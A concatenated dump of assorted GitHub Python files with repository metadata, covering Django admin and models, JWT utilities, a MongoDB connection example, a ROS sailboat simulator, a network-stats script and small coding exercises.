class ServiceList(admin.ModelAdmin):
list_display = ('cust_name', 'service_category', 'setup_time')
list_filter = ('cust_name', 'setup_time')
search_fields = ('cust_name',)
ordering = ['cust_name']
class ProductList(admin.ModelAdmin):
list_display = ('cust_name', 'product', 'pickup_time')
list_filter = ('cust_name', 'pickup_time')
search_fields = ('cust_name',)
ordering = ['cust_name']
admin.site.register(Customer)
admin.site.register(Product)
admin.site.register(Service)
|
[
"nmogulla@unomaha.edu"
] |
nmogulla@unomaha.edu
|
52fa3bcb6d8de108f027202df9afe5a89cc91e52
|
3e6698cc434f17c0ae1a490bf8f5f05eda02a717
|
/blues/models/_model_consts.py
|
f6f87b34fcd887d67df9bcf04716fdafb6fe77a7
|
[
"MIT"
] |
permissive
|
Kageshimasu/blues
|
dc6c1406712310dd395541f8892cb00328973959
|
a808fb8da86224f2e597916b04bdbd29376af6bb
|
refs/heads/master
| 2023-02-08T16:04:58.517992
| 2020-06-27T11:59:10
| 2020-06-27T11:59:10
| 259,553,037
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 555
|
py
|
from typing import List
class _ModelConst:
NUM_CLASSES = 'num_class'
NETWORK = 'network'
STATE_DICT = 'state_dict'
OPTIMIZER = 'optimizer'
MODEL_NAME = 'model_name'
class ConstError(TypeError):
pass
def get_all_consts(self) -> List[str]:
return [self.NUM_CLASSES, self.NETWORK, self.STATE_DICT, self.OPTIMIZER, self.MODEL_NAME]
def __setattr__(self, name, value):
if name in self.__dict__:
raise self.ConstError("Can't rebind const (%s)" % name)
self.__dict__[name] = value
|
[
"kageshimasu@docomo.ne.jp"
] |
kageshimasu@docomo.ne.jp
|
52554e6778796bdb4bc189811f7e83fdaf18cf7a
|
4334a4b17dd6b4b094c7387ed70d4ad0442231e4
|
/report_email.py
|
d35d5c8a47dd179f937e017dafe66f9fc553dbb4
|
[] |
no_license
|
ymuehara/Automating-Real-World-Tasks-with-Python-Week-4
|
f3fe1506bec4cb1677a3b73ea78f8f45df9a755a
|
9de4a3c32f6a07f24779f2059c4491113f64e2f3
|
refs/heads/main
| 2022-12-29T08:33:53.148697
| 2020-10-15T02:09:54
| 2020-10-15T02:09:54
| 303,873,428
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,279
|
py
|
#!/usr/bin/env python3
# https://docs.python.org/3/library/email.examples.html
import os
from datetime import datetime
import reports
import emails
def process_data(path):
data_processed = []
files = os.listdir(path)
for file in files:
if file.endswith(".txt"):
with open(path + file, 'r') as f:
inline = f.readlines()
name = inline[0].strip()
weight = inline[1].strip()
data_processed += f"name: {name} <br/>weight: {weight}<br/><br/>"
return data_processed
if __name__ == "__main__":
path = "supplier-data/descriptions/"
current_date = datetime.now().strftime('%m %d, %Y')
title = f"Process Updated on {current_date}"
info = process_data(path)
reports.generate_report("/tmp/processed.pdf", title, info)
username = "your_lab_username"
sender = "automation@example.com"
receiver = f"{username}@example.com"
subject = "Upload Completed - Online Fruit Store"
body = "All fruits are uploaded to our website successfully. " \
"A detailed list is attached to this email."
attachment = "/tmp/processed.pdf"
message = emails.generate_email(sender, receiver, subject, body, attachment)
emails.send_email(message)
|
[
"yuriuehara@hotmail.com"
] |
yuriuehara@hotmail.com
|
55058d7c8d58c89e603d4127debeb4b8df5bd25a
|
70730512e2643833e546e68761ee6cd3d7b95e1d
|
/01-python基础/code/day03/day02_exercise/exercise03.py
|
fadfaaf9e18f4ab6a6bc3a1b8aadc81dd9936e0a
|
[] |
no_license
|
Yuchen1995-0315/review
|
7f0b0403aea2da62566642c6797a98a0485811d1
|
502859fe11686cc59d2a6d5cc77193469997fe6a
|
refs/heads/master
| 2020-08-26T23:16:33.193952
| 2019-10-24T00:30:32
| 2019-10-24T00:30:32
| 217,177,822
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 406
|
py
|
"""
(扩展)在控制台中录入一个秒,计算是几小时零几分钟零几秒钟.
"""
# 10:40
total_second = int(input("请输入总秒数:"))
second = total_second % 60
hour = total_second // 60 // 60
minute = total_second // 60 % 60
# 在字符串中插入变量:
# “...x...” “..."+变量+"...”
print(str(hour) + "小时零" + str(minute) + "分钟零" + str(second) + "秒钟")
|
[
"2456830920@qq.com"
] |
2456830920@qq.com
|
b091cfdd03c19aa61ef1f7a7e0d7a8286817af51
|
bedb42966c191869be69a96b854d701bae0bcdf4
|
/results/Adaptive-vs-Direct/linear_kl.py
|
48147a5b1e641d265d6f40867ea8e8bd32edb6f2
|
[] |
no_license
|
erlerobot/parallel-trpo
|
9a1648f5b97b32dffe9a8acbadef55d39b4e3852
|
99298a7be7b88826d95b7f3e0f7fef5e0a7d7361
|
refs/heads/master
| 2021-01-25T12:01:28.920142
| 2018-03-02T15:33:58
| 2018-03-02T15:33:58
| 123,452,667
| 0
| 0
| null | 2018-03-01T15:21:37
| 2018-03-01T15:21:37
| null |
UTF-8
|
Python
| false
| false
| 959
|
py
|
import numpy as np
import matplotlib.pyplot as plt
import json
import sys
task = "HalfCheetah-v1"
times = []
rewards = []
t = []
r = []
trials = ["Reacher-v1-linear-0.000001-0.000000","Reacher-v1-linear-0.000010-0.000000","Reacher-v1-linear-0.000100-0.000000"]
for i in xrange(len(trials)):
with open(trials[i]) as data_file:
data = json.load(data_file)
times.append([])
rewards.append([])
totaltime = 0
for e in xrange(len(data["mean_reward"])):
totaltime += data["timesteps"][e]
# totaltime += 1
if i == 0:
times[i].append(totaltime)
else:
times[i].append(totaltime)
rewards[i].append(data["mean_reward"][e])
t.append(np.array(times[i]))
r.append(np.array(rewards[i]))
plt.plot(t[i],r[i],color=(1 - (i/4.0),i/4.0,1.0),label=trials[i])
plt.xlabel("Environment Steps Seen")
plt.ylabel("Average return")
plt.legend(loc=4)
plt.title(task)
plt.show()
|
[
"kevin@bobthechicken.com"
] |
kevin@bobthechicken.com
|
2480acef9f0f7d75bfb2054c94e349972ba33e3d
|
c5702152253670b4d73b104933780ba4af0dd3f8
|
/chapter14/MongoDB_py_14_2.py
|
457d8f4582cda7460e84e09d2ab0ec68521b2780
|
[] |
no_license
|
Pyrarc/TW_MongoDB_Book
|
a8519e386148a15c3c4255f0bdfbff8e20ce12c7
|
4ba5c709463c6991af9c2abd77b397b9e19c5510
|
refs/heads/master
| 2020-09-21T09:49:41.658095
| 2020-01-30T17:26:25
| 2020-01-30T17:26:25
| 224,758,007
| 5
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 723
|
py
|
#!/usr/bin/python
#This Python file uses the following encoding:utf-8
#14.2 建立連接與斷開連接
#-1. 建立連接
#導入pymongo包
import pymongo
#連接MongoDB字串
mongodb_server_uri="mongodb://<mongodb_user>:<mongodb_pwd>@127.0.0.1:27017"
#建立與MongoDB的連接,並將此連接賦值給自訂的“mongo”變數
mongo=pymongo.MongoClient(mongodb_server_uri)
#定位到E-commerce資料庫
db=mongo["E-commerce"]
#定位到Members集合
collection=db.get_collection("Members")
#讀取Members集合中的記錄數並列印
print("Number of Documents: "+str(collection.find().count()))
#關閉MongoDB連接
mongo.close()
|
[
"noreply@github.com"
] |
noreply@github.com
|
3b5faf029aed4be7d85694ac734b8aed784d187a
|
b156aad4624ec6dbc2efcca93181bbb948d16cc6
|
/utils/utils.py
|
c128221bb9fdc076717f2e26e232be3b58d048cc
|
[] |
no_license
|
itang85/bookshop-django
|
d191e2af002db94073ee8c59eeb768002443958f
|
b136629b4e5b1dc7f0661e4b06618f31c95d7ede
|
refs/heads/master
| 2023-03-28T02:59:06.729909
| 2021-03-05T15:41:49
| 2021-03-05T15:41:49
| 332,227,518
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,870
|
py
|
import base64, json, re, jwt, datetime, time, hashlib, random
from calendar import timegm
# 导入谷歌验证码相关模块
# import pyotp
# 导入使用缓存的模块
# from django.core.cache import cache
from rest_framework.throttling import BaseThrottle
from django.conf import settings
from conf.area.area_list import area_dict
from utils.settings import api_settings
def jwt_payload_handler(account):
payload = {
'id': account.pk,
'exp': datetime.datetime.utcnow() + api_settings.JWT_EXPIRATION_DELTA # 过期时间
}
if api_settings.JWT_ALLOW_REFRESH:
payload['orig_iat'] = timegm(
datetime.datetime.utcnow().utctimetuple()
)
if api_settings.JWT_AUDIENCE is not None:
payload['aud'] = api_settings.JWT_AUDIENCE
if api_settings.JWT_ISSUER is not None:
payload['iss'] = api_settings.JWT_ISSUER
return payload
def jwt_get_user_id_from_payload_handler(payload):
return payload.get('id')
def jwt_encode_handler(payload):
return jwt.encode(
payload,
api_settings.JWT_PRIVATE_KEY or api_settings.JWT_SECRET_KEY,
api_settings.JWT_ALGORITHM
)
def jwt_decode_handler(token):
options = {
'verify_exp': api_settings.JWT_VERIFY_EXPIRATION,
}
return jwt.decode(
token,
api_settings.JWT_PUBLIC_KEY or api_settings.JWT_SECRET_KEY,
[api_settings.JWT_ALGORITHM],
options=options,
verify=api_settings.JWT_VERIFY,
leeway=api_settings.JWT_LEEWAY,
audience=api_settings.JWT_AUDIENCE,
issuer=api_settings.JWT_ISSUER
)
def jwt_response_payload_handler(token, user=None, request=None):
return {
'token': token
}
# 频率组件
VISIT_RECORD = {}
class VisitThrottle(BaseThrottle):
def __init__(self):
self.history = None
def allow_request(self, request, view):
remote_addr = request.META.get('HTTP_X_REAL_IP')
# print('请求的IP:',remote_addr)
ctime = time.time()
if remote_addr not in VISIT_RECORD:
VISIT_RECORD[remote_addr] = [ctime,]
return True
history = VISIT_RECORD.get(remote_addr)
self.history = history
while history and history[-1] < ctime - 60:
history.pop()
print(VISIT_RECORD)
if len(history) < 100: # 限制的频数 设置同一IP该接口一分钟内只能被访问100次
history.insert(0, ctime)
return True
else:
return False
def wait(self):
ctime = time.time()
return 60 - (ctime-self.history[-1])
def get_region_cn(code):
province = area_dict['province_list'][code[0:2] + '0000']
city = area_dict['city_list'][code[0:4] + '00']
county = area_dict['county_list'][code]
return province + '-' + city + '-' + county
|
[
"1094252227@qq.com"
] |
1094252227@qq.com
|
53b55c5666eddc66b6f56eb33b1291a42a745e77
|
d98c999992219106832354bf329308ece67785b7
|
/food/models.py
|
b30a93daada7efa6c4c591f5aaf0bd531f51239f
|
[] |
no_license
|
shadownetz/shadownetzPortfolio
|
5f60ac1ce8b6fb38db90b1446e7eabae29c134d2
|
2f807c83f34a43310b49d396b5e0f8e3ede2aa6b
|
refs/heads/master
| 2023-04-04T13:32:49.372823
| 2021-04-16T16:26:43
| 2021-04-16T16:26:43
| 230,619,631
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,003
|
py
|
from django.db import models
from django.conf import settings
class FoodBlog(models.Model):
user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE, null=True, blank=True)
title = models.CharField(max_length=100, blank=False)
content = models.TextField(blank=False)
tags = models.CharField(max_length=500, blank=True, null=True)
views = models.IntegerField(default=0)
comments = models.IntegerField(default=0)
url = models.URLField(blank=True)
author = models.CharField(max_length=50, blank=True)
display_image = models.URLField(blank=True)
date_created = models.DateTimeField(auto_now_add=True)
def __str__(self):
return str(self.user) + '_' + str(self.id) + '_blog'
class FoodBlogComment(models.Model):
user = models.EmailField(blank=False)
blog = models.ForeignKey(settings.FOOD_MODEL, on_delete=models.CASCADE)
message = models.TextField(blank=False)
date_created = models.DateTimeField(auto_now_add=True)
|
[
"okwuzuchiagozie@gmail.com"
] |
okwuzuchiagozie@gmail.com
|
8c6784949a110d4a088c4068d153e777332244b5
|
beeb17bbfd7e47d81e90e6f79ca1e5e86d475302
|
/LeetCode/Easy/1005.py
|
9736f9fd354894d192a69a9ba28113e2de10efb1
|
[
"Apache-2.0"
] |
permissive
|
jonturkz/Competitive-Programming
|
a6b4b14d5cb72629234c3336a7cd711af8f13116
|
972c7e1b10c6c2701212c75b225daebcbe2e54f6
|
refs/heads/master
| 2022-11-17T05:47:22.423679
| 2020-07-16T15:51:22
| 2020-07-16T15:51:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 415
|
py
|
'''
@Author: zhaoyang.liang
@Github: https://github.com/LzyRapx
@Date: 2020-01-20 22:51:56
'''
class Solution:
def largestSumAfterKNegations(self, A: List[int], K: int) -> int:
if len(A) == 0:
return 0
if K == 0:
return sum(A)
heapq.heapify(A)
for _ in range(K):
cur = heapq.heappop(A)
heapq.heappush(A, -cur)
return sum(A)
|
[
"1303377506@qq.com"
] |
1303377506@qq.com
|
8d92025dbf2bb0cea6804b60fd1baa86386d8e3d
|
737f0e29fb28a4d6d0de15ef1664e68bf8d8fad3
|
/pwndbg/gdbutils/__init__.py
|
9bbeebc32d5a5e9603f23e6668e87519a1a89611
|
[
"MIT"
] |
permissive
|
MachineHunter/pwndbg-perceptor
|
ff90038bf569c523f0759899fb36f98023529084
|
183b03a7a299363632a80be0686d099976659bad
|
refs/heads/master
| 2023-08-13T09:32:36.039009
| 2021-10-08T07:17:03
| 2021-10-08T07:17:03
| 409,278,625
| 0
| 0
|
MIT
| 2021-10-08T02:22:12
| 2021-09-22T16:31:01
|
Python
|
UTF-8
|
Python
| false
| false
| 82
|
py
|
# -*- coding: utf-8 -*-
"""
Put all new things related to gdb in this module.
"""
|
[
"noreply@github.com"
] |
noreply@github.com
|
ba6698bc8cf2a56dd3bd8e3bf35d8d37a1c3de83
|
771559e2a67798375e818e845acfb96f6aa87045
|
/Practice/pattern_programs/reverse_pyramid.py
|
c2d8d9889efe754dbc5bcd9f651ed2908fb5c819
|
[] |
no_license
|
krishnareddygajjala/flash
|
1bd723f26c8d41feffbabf2cb4111402ff309f7a
|
f59b3de0726a8836c27cc550071e534b8edb4230
|
refs/heads/master
| 2018-11-08T06:43:49.345685
| 2018-08-28T13:05:46
| 2018-08-28T13:05:46
| 114,076,732
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 192
|
py
|
num = int(raw_input("enter no of rows : "))
for i in range(num,0,-1):
for j in range(0,num-i):
print "",
for j in range(0,i):
print "* ",
print ""
|
[
"gvkreddy71@gmail.com"
] |
gvkreddy71@gmail.com
|
2443df63e5d4c5517962c02559362d1ca4ab1294
|
cf2aec9e7669f239280f380ca9729c02c64f4acb
|
/src/爬虫/jd/jd/jd/pipelines/pipelines.py
|
4f8043d7dbf136f306a1688d9cb55ceaa367c8b3
|
[] |
no_license
|
scutkaihua/learning-python
|
6b7b685d1e4c263d4370b2bc6f326e35c35ad748
|
157a1b774e20fffa80c2b23ad048180d1d18f841
|
refs/heads/master
| 2023-01-24T05:50:31.193532
| 2020-11-26T09:19:47
| 2020-11-26T09:19:47
| 298,978,352
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 803
|
py
|
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html
# useful for handling different item types with a single interface
from itemadapter import ItemAdapter
import json
class JdPipeline:
def __init__(self):
self.f = open("F:/jd.txt","w",encoding='utf-8')
def process_item(self, item, spider):
return item
def close_spider(self,spider):
print("--------------------pipeline save-----------------")
spider.items['info'].sort(key=lambda x:int(x["pageindex"])*50 + int(x["index"]))
#print(spider.items)
self.f.write("{info:[\n")
for i in spider.items['info']:
self.f.write(json.dumps(dict(i),ensure_ascii=False,indent=4)+",")
self.f.write("\n]}")
self.f.close()
|
[
"kaihua.yang@163.com"
] |
kaihua.yang@163.com
|
b0a4fdf7a72979e444fdfa623f69a8f29cd809db
|
13a179f6251d8354b058ff02b3101d904b606f0b
|
/src/shepherd_simu/src/sailboat_sim.py
|
55da970d98847cf36e6b2ca0d542b0e025b062a6
|
[
"MIT"
] |
permissive
|
ENSTA-Bretagne-Shepherd/Shepherd-Ros-Structure
|
4bb2ecb146e9fbc0897a780980634a711dc1788b
|
6ce33426911fc50dfd61f165d73efe9702c2009b
|
refs/heads/master
| 2021-01-12T08:36:38.511501
| 2017-02-22T13:20:17
| 2017-02-22T13:20:17
| 76,635,278
| 1
| 0
| null | 2017-02-10T16:13:33
| 2016-12-16T08:16:52
|
CMake
|
UTF-8
|
Python
| false
| false
| 1,281
|
py
|
#!/usr/bin/env python
import rospy
from models.sailboat import Sailboat
from shepherd_reg.msg import SailboatCmd
from shepherd_disp.msg import SailboatPose
from std_msgs.msg import Float64
def update_cmd(msg):
global cmd
print 'Updated cmd:', msg.rudder_angle, msg.sail_angle
cmd = [msg.rudder_angle, msg.sail_angle]
def update_wind_direction(msg):
global wind_direction
wind_direction = msg.data
def update_wind_force(msg):
global wind_force
wind_force = msg.data
rospy.init_node('sailboat_simu')
sailboat = Sailboat(theta=0.1, v=3)
# Sailboat pose publisher
pose_pub = rospy.Publisher('sailboat/pose_real', SailboatPose, queue_size=1)
# Subscribe to the command of the sailboat
sub = rospy.Subscriber('sailboat/cmd', SailboatCmd, update_cmd)
# Subscribe to the wind
rospy.Subscriber('env/wind_direction', Float64, update_wind_direction)
rospy.Subscriber('env/wind_force', Float64, update_wind_force)
# Command
cmd = [0, 0]
wind_force = 3
wind_direction = 0
# rate
rate = rospy.Rate(10)
while not rospy.is_shutdown():
sailboat.simulate(cmd, wind_force, wind_direction)
pose = SailboatPose()
pose.pose.x = sailboat.x
pose.pose.y = sailboat.y
pose.pose.theta = sailboat.theta
pose_pub.publish(pose)
rate.sleep()
|
[
"ejalaa12@gmail.com"
] |
ejalaa12@gmail.com
|
951e54a1ed72d5527bcb0dd1b534c6ef1079a65b
|
2cc84af3d2a146b4dbb04bed3cfd542fa0622489
|
/image-tools/image_clustering/tile_clustering.py
|
1047091f0afa7d8cb8376a27b8df124a3fda22b4
|
[
"MIT"
] |
permissive
|
flegac/deep-experiments
|
e6a05b1a58eadf4c39580e95bb56d311e3dfa0ac
|
e1b12e724f2c8340cbe9c51396cf3f42e3b4e934
|
refs/heads/master
| 2020-04-09T00:20:15.132255
| 2019-10-11T16:39:47
| 2019-10-11T16:39:47
| 159,862,795
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,458
|
py
|
import glob
import os
from typing import List, Callable
import cv2
import matplotlib.pyplot as plt
import numpy as np
from matplotlib.colors import to_rgb
from scipy.stats import wasserstein_distance
from sklearn.cluster import KMeans
from sklearn.decomposition import PCA
from sklearn.pipeline import Pipeline
from image_clustering.tiler import GridTiler
from mydeep_api.tensor import Tensor
TagComputer = Callable[[Tensor], int]
HistComputer = Callable[[Tensor], Tensor]
class Params(object):
def __init__(self, bins: int = 64, pca_components: int = 64, tile_size: int = 64):
self.bins = bins
self.pca_components = pca_components
self.tiler = GridTiler(tile_size=tile_size)
def hist_computer(self, img: Tensor):
r, _ = np.histogram(img[2], bins=self.bins, range=[0, 256])
r, _ = np.histogram(img[2], bins=self.bins, range=[0, 256])
r = r / np.linalg.norm(r)
g, _ = np.histogram(img[1], bins=self.bins, range=[0, 256])
g = g / np.linalg.norm(g)
b, _ = np.histogram(img[0], bins=self.bins, range=[0, 256])
b = b / np.linalg.norm(b)
return np.hstack((r, g, b))
class ClusterTagComputer(TagComputer):
def __init__(self, path: str, hist_computer: HistComputer):
self.hist_computer = hist_computer
self.clusters = [
[hist_computer(cv2.imread(img_path)) for img_path in glob.glob('{}/{}/*.png'.format(path, _))]
for _ in os.listdir(path)
]
self.stats()
def stats(self):
for _ in self.clusters:
for c in _:
bins = np.array(range(len(c)))
prob = c / np.sum(c)
image = np.sort(np.random.choice(bins, size=128 * 128, replace=True, p=prob)).reshape((128, 128))
plt.imshow(image, 'gray')
def __call__(self, data: Tensor):
hist = self.hist_computer(data)
d2 = [min([wasserstein_distance(hist, _) for _ in c]) for c in self.clusters]
return int(np.argmin(d2))
class KmeanTagComputer(TagComputer):
def __init__(self, p: Params, images: List[str], cluster_number: int):
self.hist_computer = p.hist_computer
self.model = KMeans(n_clusters=cluster_number, n_init=20)
dataset = []
for _ in images:
img = cv2.imread(_)
boxes = GridTiler(tile_size=32).tiles(img.shape[:2])
histograms = [p.hist_computer(box.cut(img)) for box in boxes]
dataset.extend(histograms)
self.pipeline = Pipeline(steps=[
('pca', PCA(n_components=p.pca_components)),
('clustering', self.model),
])
self.pipeline.fit(dataset)
# self.stats()
def stats(self):
centers = (self.model.cluster_centers_ + 1) / 2
for c in centers:
bins = np.array(range(len(c))) * 4
prob = c / np.sum(c)
image = np.sort(np.random.choice(bins, size=128 * 128, replace=True, p=prob)).reshape((128, 128))
plt.imshow(image, 'gray')
def __call__(self, data: Tensor):
hist = self.hist_computer(data)
return self.pipeline.predict([hist])[0]
def tile_clustering(img: Tensor, tag_computer: TagComputer, tiler: GridTiler):
out = img.copy()
k = 8
for box in tiler.tiles(img.shape[:2]):
flag = tag_computer(box.cut(img))
pt1 = (box.left + k, box.top + k)
pt2 = (box.right - k, box.bottom - k)
cv2.rectangle(out, pt1, pt2, tuple(256 * _ for _ in to_rgb(COLORS[flag])), 2)
return out
COLORS = ['red', 'blue', 'green', 'white', 'yellow',
'orange', 'purple', 'cyan', 'magenta', 'gray']
P = Params(
bins=128,
pca_components=128,
tile_size=128
)
if __name__ == '__main__':
dataset = 'cs'
images = glob.glob('../tests/20190802_export_s2_it1/{}/*_?.png'.format(dataset))
model_tag_computer = KmeanTagComputer(P, images, cluster_number=4)
cluster_tag_computer = ClusterTagComputer('../image_editor/tiles', P.hist_computer)
os.makedirs(dataset, exist_ok=True)
for _ in images:
name = os.path.basename(_).replace('.tif', '')
img = cv2.imread(_)
img1 = tile_clustering(img, model_tag_computer, P.tiler)
cv2.imwrite('{}/{}_model.png'.format(dataset, name), img1)
# img2 = tile_clustering(img, cluster_tag_computer, P.tiler)
# cv2.imwrite('{}/{}_clusters.png'.format(dataset, name), img2)
|
[
"florent.legac@gmail.com"
] |
florent.legac@gmail.com
|
d296839330771f766c3d3017ae333bce65eb9717
|
9797b289a89012f381c6b1de794374ab0d73ed1a
|
/Chapter_4/4.13.py
|
cfbf7008b36941149c4702d4cd9dc81c4bac8279
|
[] |
no_license
|
qh4321/1_python_crash_course
|
23c26d1c39cd0808e987fb8992e092a34aacc489
|
aa2d72857e3173a3951e52538607b6e331f50a24
|
refs/heads/master
| 2022-12-31T09:03:47.660232
| 2020-10-22T13:33:13
| 2020-10-22T13:33:13
| 301,715,691
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 346
|
py
|
buffet = ('beef', 'chicken', 'nuddle', 'egg', 'fish')
print('\nYou can choose from the following menu items:')
for food in buffet:
print('- ' +food)
buffet = ('beef', 'chicken', 'nuddle', 'duck egg', 'pizza')
print('\nOur menu has been updated.\nYou can now choose from the following menu items:')
for food in buffet:
print('- ' +food)
|
[
"52791020+qh4321@users.noreply.github.com"
] |
52791020+qh4321@users.noreply.github.com
|
588b694346582a0678e68e17a1ba246a85b81a9f
|
71249a03c862007f97fc1af2c5ce41b5e170a8fe
|
/project/CensorThis_WebApp/serializers.py
|
5c108491518e4a5d2f8b9b8af301040cc3e5e5af
|
[] |
no_license
|
ShayGeko/Fall2020-Hackathon
|
0f5d0a59ea9274c06df81e2263979228b3e968db
|
2228cbdd694caa558946bbe4bfac465c5def5981
|
refs/heads/main
| 2023-01-06T23:02:11.525821
| 2020-11-09T04:18:20
| 2020-11-09T04:18:20
| 310,875,500
| 0
| 0
| null | 2020-11-08T03:26:33
| 2020-11-07T15:34:56
|
Python
|
UTF-8
|
Python
| false
| false
| 1,045
|
py
|
from django.contrib.auth.models import User, Group
from rest_framework import serializers
from CensorThis_WebApp.models import Censor
class UserSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = User
fields = ['url', 'username', 'email', 'groups']
class GroupSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Group
fields = ['url', 'name']
class CensorSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Censor
fields = ['toCensor', 'censorWith']
def create(self, validated_data):
toCensor = validated_data.get('toCensor', None)
if toCensor is not None:
censor = Censor.objects.filter(toCensor = toCensor).first()
if censor is not None:
newCensor = censor
newCensor.censorWith = validated_data.get("censorWith", None);
return newCensor
newCensor = Censor.objects.create(**validated_data)
return newCensor
|
[
"shramko.georgiy@gmail.com"
] |
shramko.georgiy@gmail.com
|
d6ce1c57d5d48ad3fcd540884b07b83997ecc399
|
4c3e992678341ccaa1d4d14e97dac2e0682026d1
|
/addons/mass_mailing/tests/test_mail.py
|
09822f1c111822ef55b13830edbcad40590accf1
|
[] |
no_license
|
gahan-corporation/wyatt
|
3a6add8f8f815bd26643e1e7c81aea024945130d
|
77e56da362bec56f13bf0abc9f8cf13e98461111
|
refs/heads/master
| 2021-09-03T18:56:15.726392
| 2018-01-08T02:54:47
| 2018-01-08T02:54:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 328
|
py
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from gerp.addons.mail.tests.common import TestMail
class test_message_compose(TestMail):
def test_OO_mail_mail_tracking(self):
""" Tests designed for mail_mail tracking (opened, replied, bounced) """
pass
|
[
"duchess@gahan-corporation.com"
] |
duchess@gahan-corporation.com
|
536b5a31bb0aab2c739d1cca6e137402a670a21d
|
358e1f9957c7c3aeaf2bd45d1d0a9cddc2f77180
|
/Lesson 4/Lesson4 - type hinting/type_test.pyi
|
03ba1f989bd692d85e0d4773439d0d77d434d812
|
[
"MIT"
] |
permissive
|
kiruxa555/MADPythonCourse
|
906e4f272aa47722586e18974239cf841aa9a3ca
|
f3bd38dcd30dc220bd691d301b2845401cc70b2e
|
refs/heads/master
| 2023-06-12T02:21:11.572197
| 2021-06-30T08:07:10
| 2021-06-30T08:07:10
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 39
|
pyi
|
def add(a: int, b: int) -> int:
...
|
[
"madmasm@gmail.com"
] |
madmasm@gmail.com
|
8f070f7d9758539e7bd4263bceb1250c00f22a0a
|
5e2c41f3ab0c55e6a71ae421b3a99c46482efe6e
|
/ethstats.py
|
6ff00d14dc7754e54196cb0c4c07600b933053dc
|
[] |
no_license
|
rytisz/utils
|
9bff61ac2559b601ec3484bcee246e4ebe5b3c0f
|
f5178a98acf739745ff72ee41d0de6bc993f8ed5
|
refs/heads/master
| 2021-01-19T18:53:13.478723
| 2017-03-04T00:57:47
| 2017-03-04T00:57:47
| 83,710,412
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,259
|
py
|
#!/usr/bin/python
from optparse import OptionParser
import time
import sys
parser = OptionParser()
parser.add_option("-n", "--period", dest="PERIOD", default=1,
help="average period in seconds, default 1 sec")
parser.add_option("-i", "--interface", dest="INTERFACE", default="all",
help="interface witch statistics is measured, default all interfaces")
(options, args) = parser.parse_args()
class ethstats:
def __init__(self):
self.interface = vars(options)['INTERFACE']
try:
self.period = int( vars(options)['PERIOD'])
except ValueError as e:
sys.stderr.write("Wrong period n: '%s', n should be integer\n"%vars(options)['PERIOD'])
sys.exit(1)
try:
self.previous, self.pts = self.__read_stats()
except KeyError as e:
sys.stderr.write("Interface %s not found\n"%e)
sys.exit(1)
def __read_stats(self):
d= {}
l= []
with open('/proc/net/dev') as f:
next(f)
next(f)
for line in f:
l= line.split()
d[l[0].rstrip(':')]=list(map(int,l[1:]))
ts=time.time()
if self.interface == "all":
return d, ts
return {self.interface:d[self.interface]}, ts
def get(self):
current, cts = self.__read_stats()
rez={}
for interface in current:
rx=(current[interface][0] - self.previous[interface][0])*8/10**6/(cts-self.pts)
tx=(current[interface][8] - self.previous[interface][8])*8/10**6/(cts-self.pts)
rpps=(current[interface][1] - self.previous[interface][1])/10**3/(cts-self.pts)
tpps=(current[interface][9] - self.previous[interface][9])/10**3/(cts-self.pts)
rez[interface]=[tx,tpps,rx,rpps]
self.previous, self.pts = current, cts
return rez
stats=ethstats()
while True:
try:
time.sleep(stats.period)
rez=stats.get()
for interface in rez:
sys.stdout.write("%10s: TX%9.2f Mbps%8.2f kPPS RX%9.2f Mbps%8.2f kPPS\n"%tuple([interface]+rez[interface]))
sys.stdout.flush()
except KeyboardInterrupt:
break
|
[
"rytiszigmantavicius@gmail.com"
] |
rytiszigmantavicius@gmail.com
|
4fe27b358e04b2dd76cba83b1b138fdd6e369026
|
29fd3daff8c31764c00777e67d2cc9b3e94ba761
|
/examples/ch05_examples/mandelbrot/mandelbrot/cython_pure_python/setup.py
|
440f9ca05742dda490c59ab9d203bd5d6f221906
|
[] |
no_license
|
mwoinoski/crs1906
|
06a70a91fc99e2d80e2ed3cea5724afa22dce97d
|
202f7cc4cae684461f1ec2c2c497ef20211b3e5e
|
refs/heads/master
| 2023-06-23T17:13:08.163430
| 2023-06-12T21:44:39
| 2023-06-12T21:44:39
| 39,789,380
| 1
| 2
| null | 2022-01-26T20:43:18
| 2015-07-27T17:54:56
|
Python
|
UTF-8
|
Python
| false
| false
| 424
|
py
|
from distutils.core import setup
from distutils.extension import Extension
from Cython.Distutils import build_ext
# for notes on compiler flags e.g. using
# export CFLAGS=-O2
# so gcc has -O2 passed (even though it doesn't make the code faster!)
# http://docs.python.org/install/index.html
setup(
cmdclass = {'build_ext': build_ext},
ext_modules = [Extension("calculate_z", ["calculate_z.pyx"])]
)
|
[
"michaelw@articulatedesign.us.com"
] |
michaelw@articulatedesign.us.com
|
95eaf80a4b064aa8106077d14d8e97f76da9bee4
|
9a03b4c88a31cc05648f6a7dee1c22cfe08dc872
|
/mod_pydoc.py
|
dacb667e4bae87618e48f4bc9594ad048609d8f4
|
[] |
no_license
|
u8y7541/mod_pydoc
|
71a9f1802752a79d560c7cc155f060227ec7bf99
|
a5fdf9409debf39724bd1fbf5553d86b117e201b
|
refs/heads/master
| 2021-05-04T09:11:26.622118
| 2016-10-09T17:45:25
| 2016-10-09T17:45:25
| 70,418,784
